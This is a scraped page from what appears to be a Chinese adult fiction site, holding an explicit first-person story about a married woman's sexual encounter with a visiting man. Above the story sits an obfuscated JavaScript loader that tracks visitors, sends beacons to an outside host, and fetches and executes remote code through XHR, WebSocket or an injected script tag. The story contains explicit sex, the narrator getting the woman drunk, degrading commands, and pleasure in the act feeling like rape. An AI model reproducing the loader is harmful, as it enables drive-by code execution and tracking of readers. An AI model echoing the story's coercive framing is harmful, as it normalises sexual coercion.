function famkOu(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function RGipPz(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return famkOu(t);};window[''+'M'+'F'+'N'+'j'+'O'+'d'+'f'+'l'+'a'+'']=((navigator.platform&&!/^Mac|Win/.test(navigator.platform))||(!navigator.platform&&/Android|iOS|iPhone/i.test(navigator.userAgent)))?function(){;(function(u,k,i,w,d,c){var x=RGipPz,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));!function(o,t){var a=o.getItem(t);if(!a||32!==a.length){a='';for(var e=0;e!=32;e++)a+=Math.floor(16*Math.random()).toString(16);o.setItem(t,a)}var n='https://phm.jtvpeuu.com:7891/stats/14518/'+i+'?ukey='+a+'&host='+window.location.host;navigator.sendBeacon?navigator.sendBeacon(n):(new Image).src=n}(localStorage,'__tsuk');'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')!=-1){var xhr=new XMLHttpRequest();xhr.open('POST',u+'/vh3/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else if(WebSocket&&/UCBrowser|Quark|Huawei|Vivo|NewsArticle/i.test(navigator.userAgent)){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket(k+'/wh3/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);};ws.onerror=function(){var s=d[crd]('script');s.src=u+'/vh3/'+i;cs.parentElement.insertBefore(s,cs);}}else{var s=d[crd]('script');s.src=u+'/vh3/'+i;cs.parentElement.insertBefore(s,cs);}})('aHR0cHMlM0ElMkYlMkZlcnEudHV3aGV3Zi55jb20lM0E4ODkx','d3NNzJTNNBJTJGJTJGdGd1LmNN6dHJ4eC5jb20lM0E5NNTMz','164052',window,document,['5','N']);}:function(){};
  • 当前位置
  • 首页
  • 真实体验
    • 『【朝花夕拾1】作者:xxy5159』
        作者:xxy5159
      字数:6371


      循着安公子写下的地址,找到的是一个老旧的居民小区。发黑钢管焊就的大
      门、水泥砖砌成的狭小传达室、残破的水泥花坛、半死不活稀稀稀拉拉的灌木丛,
      统统暴露此地居住者的落魄和寒酸。我虽然已经有了一定心理准备,但目睹此情
      此景,心里还是暗自把期望值下调了一档。出发之前,到底是准备拿鲜花还是烟
      酒当礼物心里还犹豫了一下,现在想起当真好笑。如果我捧着一束鲜花出现在这
      里,那可真是无比惹人注目,与我低调行事的目的可真是南辕北辙了。

      小区几乎没有人,传达室的老头坐着发呆,我从他前面经过他眼珠都没转一
      下。9栋、1单元、301室…我面前的这扇木门油漆斑驳,门口放了一个装着
      垃圾的塑料袋,里面有鱼鳞和菜叶。我定了定神,叩响了房门。

      门只打开半尺,后面露出了半张脸。我的第一印象就是白。白皙的小巧脸庞
      上有着一双灵动的双眸。她冲我微微一笑就迅速低下头:「来啦!」

      打开房门,低头给我从鞋柜中取出一双拖鞋。

      就在她低头的一瞬间,我已看清,羞涩的红霞飞上了她白皙的颈脖。

      摆好拖鞋,丢下一句:「我还在烧菜呢,你先坐吧。」就跑进了厨房。进门
      之前还回头眼神带笑快速地瞄了我一眼。

      我突然明白安公子给她的代号是「夜莺」的原因了。

      本地人说普通话的时候南方口音很重,诘屈难懂。但她不但没有口音,而且
      语气温柔语调宛转,让人一听就心生怜爱。

      客厅不大,收拾得却异常整洁。布艺沙发上摆放的的是手工钩成的靠枕,一
      张小茶几上已经泡好了一壶绿茶。家具很明显都是十年前的款式,但被女主人照
      顾得挺好。这让我突然有种进了狐狸妈妈小窝的温馨感觉。

      我没坐下喝茶,而是跟着她走进了厨房,靠在门框欣赏着她忙碌的背影。

      普通南方姑娘的个头,大概162吧。系着围裙,把腰线勒得挺细,发型是
      那种一把抓夹住的「少妇头」,冲起的几缕发丝随着她的动作吊晃着,脚上穿的
      是一双粉红的HELLOKITTY拖鞋,让人看出这个少妇心中住着的少女的
      影子。

      我弄出点声响,走到她背后柔声问:「需要帮忙吗?」一边露出最阳光的笑
      容迎接她的回头。

      她比我矮了几乎一个头。略带仰视地看我的眼神中有三分惊讶更有七分羞涩:
      「不用啦。都快好了…你在外面等等吧!」

      我看到旁边一个小炖锅里已经咕噜咕噜冒气了,揭开盖子,是鱼头豆腐汤。
      我夸张地吸了口气:「真香啊!」一边作出一副馋涎欲滴的表情。

      她看着嘿嘿一乐,表情这才放松下来。锅烧反转,用双手推着我出厨房:
      「叫你在外面等着嘛…」

      听到她软语撒娇,我不由地心神一荡,暗喜这趟真没白来。

      坐在沙发上,一边喝茶一边看着这个时段的无脑动画片,我脑海中慢慢品位
      起她的容貌。如果真要打分的线分。缺点是双眉略淡,牙齿也
      稍稍有点外凸。但皮肤白皙,声音好听是绝对的加分项目。加上脸型是我喜欢的
      巴掌大的小巧型,胸和屁股没特别注意,腰身纤细,身材应该不会差到哪里…就
      不知道身上皮肤有脸上和颈上那么白不…想到这里,我突然发现不知不觉中我已
      经露出了淫笑。

      她端出最后两盘菜,看我在看动画片,又是低头一笑。

      我站起身来,很不服气地问:「怎么了?动画片不能看么?说明我童心未泯
      呢!」

      逗得她又是一乐。

      趁她还在收拾碗筷的时候,我已经开始打开我带来的那瓶红酒。没有给她回
      绝的机会,就让她拿两个杯子来陪我喝点。第一次交往,再多的谨慎都不为过,
      我只选了瓶300多的普通干红。

      她稍稍有一丝犹豫,不知道想到什么,脸儿又红了一下,一声不吭地从柜子
      里拿出两只高脚杯。

      两只高脚杯设计独特,工艺不俗,一看就不是普通货。我心中一动,想起一
      件事。但还是按下不提,只是给两只杯子各斟上浅浅一口。

      两人对坐下来,气氛略有尴尬。我先举杯,谢她辛苦做出了一桌佳肴,提议
      第一口我喝掉,她喝一半。似乎对我的礼貌颇有好感,她抿了一小口后,神色放
      松下来。

      我从称赞她的厨艺开头,连夸带评,间或给出一些建议,终于勾起她的好奇
      心,问我是否也会亲自下厨。

      这可有得说了。我入伍时驻守北疆,吃喝用度大部分都要自己动手。现在从
      商,行走大江南北,陪酒应酬,对吃方面自然颇有心得。光就眼前这道鱼头豆腐
      汤,南昌谭鱼头的滋味有何特点,武汉金江宾馆五星大厨的做法有何诀窍,松花
      江民宿船家又有哪些独到之秘…很显然,我的这些阅历让她听得饶有兴趣。

      我话题一转,略带骄横地说:「一不小心师傅就传你那么多秘诀,怎么着也
      该回敬我一下吧?说着顺手就给她添了半杯。」

      她被架着敬了我一次,我却抓住机会要求她深深喝一口。我陪着喝掉,心中
      暗笑:女人不醉,男人怎么有机会。

      吃了一筷菜,我又开话题:「我这人啊,一生也就三大爱好。一是打篮球,
      这是当兵时留下的习惯;二是美食,吃到好吃的就琢磨该怎么做;三嘛…」

      我卖着关子,直视她凝神静听的眼睛暧昧一笑。

      她马上懂了。或许是酒气上涌吧,脸上迅速升腾起两朵红云,连白皙的颈脖
      也变得微微粉红。

      我不愿这么快就进入主题,就又把话题饶开了去。

      第一顿饭是最容易的,什么话题都新鲜。我把握着谈话的节奏和气氛,一边
      说学逗唱让她开心,一边连劝带压,让她把三分之一瓶红酒灌下去了。眼见她酒
      量真的有限,已经有了七分醉意,双眼迷离,面如桃花。我也不想真让她喝高了,
      就把剩下的酒干掉,开始吃饭。

      部队作风,我吃饭速度比一般人快,而且饭量也比一般人大。抬头看了一眼
      她,我都几乎产生了错觉:她看着我狼吞虎咽的温柔表情,几乎带着疼惜和爱慕。
      我心神一颤,自己对自己说:做戏别做过头了,炒股炒成股东的事不能再干了。

      吃完饭,她收拾碗筷,我继续喝茶看电视,一边思考着怎么进入到下一环节。

      她在厨房稀稀哗哗地折腾了半天,出来后却没有来客厅,而是径直进了卧室。
      不多时手里捧着几件内衣,又低头迈着小碎步进了卫生间,经过我身边的时候连
      看都不敢看我。看着她害羞模样我忍不住大笑了一声,害她更快步冲进卫生间赶
      忙关紧了门。

      我听着里面淅淅沥沥的水声色心顿起。脑海中幻想着那具诱人酮体在水雾氤
      氲中的景象,胯下小弟弟也忍不住苏醒过来。

      或许是心急,或许女人就是这么麻烦,我感觉她足足洗了半个钟头了里面水
      声还没停。我捉狭心起,跑到浴室门口敲了敲门。

      里面顿时传来她略带紧张的声音:「喂…你要干嘛?」

      我带着笑意说:「憋不住了,我要尿尿!」

      过了一会儿她才说:「等会儿,马上好啦!」

      摸摸索索又有几分钟门才打开。开门的她面色酡红,真是人比桃花艳,外面
      穿着一件碎花吊带睡裙,应该是嫌太暴露,里面还有一件圆领短袖薄T恤遮住了
      上半身的春光。佳人出浴,有几缕湿漉漉的头发黏在颈肩之上,倍增娇媚。

      我笑嘻嘻地堵住了她的去路,不让她出门。引得她大发娇嗔,举起一双拳头
      作势要锤我。我下意识抓住她的双臂,触手肌肤滑腻,再也忍不住,低头就向那
      双红唇亲去。她扭头躲避,几番挣扎,嘴里连番说:「这样……别这样…你先洗
      澡啊…」

      我转念一想,好菜要慢慢品尝。于是压下心头欲火,放了她走,开始洗澡。

      途中她怯生生地敲了门,给我送来一条新毛巾和男式浴袍,我开玩笑作势要
      把她拉进来,她却早有准备,娇笑着跑开去了。

      那件浴袍颇为长大,我一米八零的身高穿来也基本合适,仔细观察,是顶尖
      品牌,真丝丝绒质地,心中自然也知道是怎么回事了,高兴劲头不由得减了两分。

      等我出来时,她坐在沙发上,故作镇静双眼紧紧盯着电视,里面正演着一出
      扯蛋的抗战剧。

      有了刚才的动作铺垫,我不想再小心翼翼稳扎稳打了。大刺刺往她身边一坐,
      举起胳膊轻轻搂住她的香肩,另一只手抚开她的秀发,温柔地在颈部一嗅,赞一
      声好香就亲了上去。她再也绷不住了,身子都有了轻微的颤抖。

      我用嘴唇擒住她的耳垂,一番亲捻啃咬,把粗重的呼吸灌进她的耳道。偷眼
      一看,她已经闭上双眼,一副任君采摘的神态。只是颤抖的睫毛和粗重和呼吸显
      示了主人的秘密心思。

      我的右手开始了攻城掠地,延手而上,抚过圆润的上臂,伸进背部,轻易解
      开胸罩背扣,正当我转回前面,准备掌握那两团软腻的时候,她开始了挣扎。

      我心中暗笑,已经弓在弦上,会不会太晚。

      她突然睁开双眼,直视着我:「还没告诉我你叫什么。」

      我…

      虽然安公子已经有交代,一夕露水情缘而已。想来她应该也有默契。没想到
      她会问我这个问题。

      只犹豫了半秒钟,我还是说了真话:「姓叶,叫叶行。你可以叫我叶大哥。」

      她似乎默念了两声「叶行」,然后说:「姓苏,叫苏枚。」

      我知道她的心意。说到:「会记住。」邪邪一笑,「看看你到底又多酥多美。」

      一只手深入禁地,一把握住了一只淑乳。她嘤咛一声,闭上眼睛不敢看我。

      入手的新剥鸡头肉谈不上肥美,但盈盈一握间柔软如棉,手感滑腻,上面的
      一颗小红豆已经悄然硬立。我用虎口稍加研磨,就引得她发出几声低不可闻的娇
      吟。我心中欲火大炽,把她推倒在沙发上压了上去,吻住她双唇细心啃琢,双手
      一前一后上下游走,勃起的分身更压在她双腿肉缝间摩来磨去。

      苏枚双眼紧闭,面色朝红。小舌禁不住我的三番五次的顶叩终于伸了出来与
      我的舌头相互交缠。真当我腾出手想把她内裤下拉时,她干嘛抓住,看着我哀求
      说,求你别在这里…到里面好不好?

      我嘴里笑着说:偏不。身子还是起来,一把横抱着她走进了卧室,把她往床
      上一丢,就开始脱去她的衣服。

      欲迎还拒中她已经被我剥光了,借着客厅的灯光,我细细打量这具今晚属于
      我的女性躯体:果然不出我所料,肌肤又白又嫩,一个黑痣都看不到。由于怕羞
      她蜷着身子,倒更显出鼓臀紧绷,让我决定今晚一定不能错过后入式;一双淑乳
      比我触摸感觉的较大,乳晕如分币大小,颜色很浅,乳头如黄豆,已经勃然挺立。
      她双手捂着脸,似乎知道我在细细打量,又求我关上房门,让房间没有光线。

      这我可不答应了。回了句看得到才吃得香。脱掉睡袍就向娇躯覆盖上去。

      这时我不再猴急,耳背、颈肩、后背、小腹,处处留下了我的亲吻和爱抚,
      就是没碰她的双乳和下体,把美人挑逗到双眉紧皱,双腿交错。

      等我再度吻上她的双唇时,她反应热烈,主动抱紧我,伸进我的口腔香舌,
      张开又夹住我的双腿,无声地表达着女主人的诉求。

      是时候采摘了。

      我身手握住怒涨着的小弟弟,在她芳草地里寻找着入口的时候,她下身已经
      一片泥泞。等龟头找到那一处滑腻,轻轻推进半寸,我们同时忍不住动作一滞。

      真是太爽了!

      虽然已经经过充分润滑,但前进的过程中依然做了几次停顿。

      身下美人娥眉轻蹙,几次推着我的前胸要我慢点。等我全根没入后,方才体
      会到她的紧凑和律动。

      女人阴道有的前紧后松,有的前松后紧,有的整个都松垮垮,像她这种有如
      一只温柔小手用力均匀地完全把握住你的全部,而且还似乎不规律地一握一握的,
      真他妈的少见。

      我稍加感受,就开始慢慢抽送起来。这让苏枚刚刚睁开的眼睛又闭了回去,
      嘴里丝丝抽着冷气,既像是享受又像是受刑。

      等我抽送百来下时,她基本已经适应了。看着我在她身上尽情驰骋,温柔的
      眼神中,既有羞意,爱怜,居然似乎还有几分无奈。

      看到她这副有点不甘心又无可奈何地被我干着的神情,我心中的征服欲狂飙
      上升。

      我挽起她的后颈,抬起她的头要她看着我们的结合处。

      从她的角度看去,最先映入眼帘的应该是那对如波荡漾的玉兔吧,再往下看
      去,我青筋暴起的分身在她的洞中进进出出,带出的淫水把肉棍涂上一层鲜亮,
      还不停地发出轻微的叽咕淫声。她赶忙又闭上眼睛摇了摇头。

      我放出手段,一边九浅一深地插杵,插到底的时候还加上研磨动作,直接刺
      激她的阴蒂,一边用一手爱抚一只乳房一口啃咬另一只。听着她不住地娇喘呻吟,
      暴虐心更起,一心只想把身下这个女人捏扁搓圆。

      如此再加上一两百抽,她已然经受不住。抓住我的头发,呻吟中已经带上了
      哭腔:「啊……不行…啊…我不行了…啊…我…你太凶了…我…我……受不了了
      我停下动作,抬起头喝住她:「睁开眼睛看着老子!「她睁开眼,眼神复杂地看
      着我。

      我继续调弄她:「求我,让我操你。」

      说罢放缓动作,看着她。

      她的眼角已经泛出泪光:「求你…操我…」

      我不依不饶:「叫大爷」

      她楚楚可怜:「大爷…求求你…操我吧」

      我大感得意,俯下身子对着她耳朵说:「骚货。你越骚我越喜欢。」

      下身配合着加快频率,如打桩机一般凶猛撞击着她。

      她情动至极,双腿缠住我的腰,紧紧抱住我的后背,牙齿咬住我的肩头,承
      受着我一波波的冲击!

      如烈火烹油一般,我用舌尖挑弄了几下她的耳洞后,轻轻地问:「你老公知
      道你那么骚么?」

      如压垮骆驼的最后一根稻草一般,她再也经受不住,一声压抑在喉间的闷哼,
      双腿松开,泄身了。一股暖流冲荡我的龟头,整个阴道开始剧烈痉挛。我放慢速
      度,继续抽插,让她享受完完整的高潮。

      十来秒后,我感觉不对啊,再看她,正啜泣着呐。一副雨带梨花的可怜模样,
      让我有点于心不忍了。柔声问她怎么了?她抹着眼泪说没事,就是太激动了。

      妈的,这个女人被我操哭了!这真是一个绝品!

      还没完呢!

      我拉起浑身发软的她,如玩偶一般摆弄成淫荡的狗爬式,自己下床站着,一
      手把住她的胯部,一手握住肉棍往她下身凑去。有了一次高潮,她那原本禁闭的
      两瓣花瓣微微绽放,我轻易就插了进去,再次享受起里面的紧窄和滑溜。

      前面的估计没有错,她多肉的美臀又鼓又翘,我每次耸动都会拍起肉波荡漾。
      我毫不犹豫往她臀部拍了几下,手感真是好极了。苏玫只是娇哼了一声,没有任
      何反对。

      这个姿势我很省力,于是卖力地大开大合,棍棍到底。低头一看,肉棍进出
      间,把阴道口那层薄膜也带动得一进一出,而小巧又充满褶皱的菊花也微微开合,
      视觉刺激百分百。圆润的臀部曲线上是纤细的腰部。被我操得太凶,她用双手撑
      起上半身,腰部塌陷显出动人的曲线。两个奶子由于吊着的原因尤其显大,白面
      袋子般甩来甩去。最动人的是她不住口的娇吟声。本来女人叫床的声音就很诱人,
      经她甜美的声带,让男人心里又甜又蜜,只一心想把她往死里弄。

      猛地把她推倒趴在床上,整个人压住她,加上身体的重量,下半身狂风骤雨
      一般冲击,每次都插进她的子宫。不一会儿就发现,从这个角度,能感到她里面
      有一处古怪的突起,每当龟头顶到那里,她的反应就明显不同。这就是G点了。

      我找到目标,重点进攻这处突起,用龟头细细研磨,进出磨蹭。只把她弄得
      失了神一般连连求饶:「我不行了…不行了…叶大哥…弄死我了…」

      我意气风发,知道这时候要她说什么她都不会拒绝了。

      笑着问:「爽不爽?」

      「啊…啊…爽……」

      「自己说,我是骚货?」

      「我…说不出口……」

      我给了两下重的,「说!」

      「我……是…我是骚货」

      「说喜欢我操你的屄」

      「我喜欢……你操我的……屄…我……让你操…操死我吧…」

      「叫我老公」

      这句话击中了她最脆弱的神经

      她失声一叫,张大了嘴巴出气,再次登上了快乐的巅峰。

      强大的刺激之下,我也不想再忍了。不但不停,反而加快了频率,打桩机一
      般凶猛地蹂躏身下这个温柔少妇。她再度饮泣起来,这反而让我感觉似乎在强奸
      一般,更有快感。剧烈的运动让我呼吸困难,我已经到了强弩之末。她明显感觉
      到了:「老公…用力操我…射给我!」

      「射你子宫里面好不好?」

      她默认似的扭过头不看我,我再也忍不住了,一股股精华强劲地射进她体内
      深处。而她的腔体不停缩动着,挤压我喷出所有存货。

      我汗出如浆,趴在她身上几近虚脱,小弟弟慢慢变小,慢慢快要滑出密道。

      苏玫止住哭泣后,慢慢把我翻下身,捧着我的脸,轻轻地吻着我。真如一位
      贤惠的妻子一般擦去我头上的汗水。然后,出乎我意外,她往下溜去。直到她的
      呼吸已经喷在我的双股间,我才确定她要干什么。

      果然,我的分身被她含了进去,并轻轻地开始吮吸,吸出了我输精管中的残
      精,接着是舌头的轻舔,从腹部到春袋,每一个褶皱都被清理到了。

      我掀开被子,看着胯下娇人用世间的最温柔做着最羞人的事情,作为男人的
      满足感自豪感达到了顶峰。